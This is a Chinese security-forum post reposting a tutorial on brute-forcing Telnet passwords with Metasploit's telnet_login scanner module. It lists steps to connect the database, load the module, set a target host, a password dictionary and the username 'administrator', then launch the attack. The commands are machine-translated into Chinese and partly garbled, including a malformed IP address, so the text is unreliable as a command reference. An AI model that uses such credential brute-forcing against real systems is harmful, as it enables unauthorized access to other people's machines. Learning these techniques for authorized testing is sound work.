Ghost网安小组-Ghostgroup

 找回密码
 立即注册
搜索
热搜: 渗透
查看: 39|回复: 0

msf_info爆破

[复制链接]
发表于 2019-11-13 13:30:03 | 显示全部楼层 |阅读模式



https://blog.51cto.com/13319402/2073011
1.进入metasploit:
root @ debian:〜#msfconsole
2.进行数据库连接:

msf> db_connect msf_user:111111@127.0.0.1/msf_database在后台重建模块缓存...
msf>连接到msf_database
3的db_status postgresql 。进行搜索下telnet模块
msf>搜索telnet_login

======== ========

名称披露日期等级描述

辅助/扫描仪/ telnet / telnet_login普通Telnet登录检查扫描仪
4.使用模块:
msf>使用辅助/扫描仪/ telnet / telnet_login
msf辅助(scanner / telnet / telnet_login)>
5.查看配置选项:
msf辅助(scanner / telnet / telnet_login)>显示选项

模块选项(辅助/扫描仪/ telnet / telnet_login):
6.进行配置:
auliary(scanner / telnet / telnet_login)>设置RHOSTS 192.168.152.1299```
RHOSTS => 192.168.152.129目标主机设置
集PASS_FILE /根/通过选择密码字典表
组USERNAME管理员设置用户名
利用进行爆破
7.查询查询结果查看
爆破远程登录密码登录
速度的快慢取决于密码复杂度与字典搜索表大小msfdb init->armitage
We Are Ghost
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ| Ghost网安小组-Ghostgroup |网站地图

GMT+8, 2020-3-29 04:27

Powered by Aatrox

© 2001-2020 We Are Ghost

快速回复 返回顶部 返回列表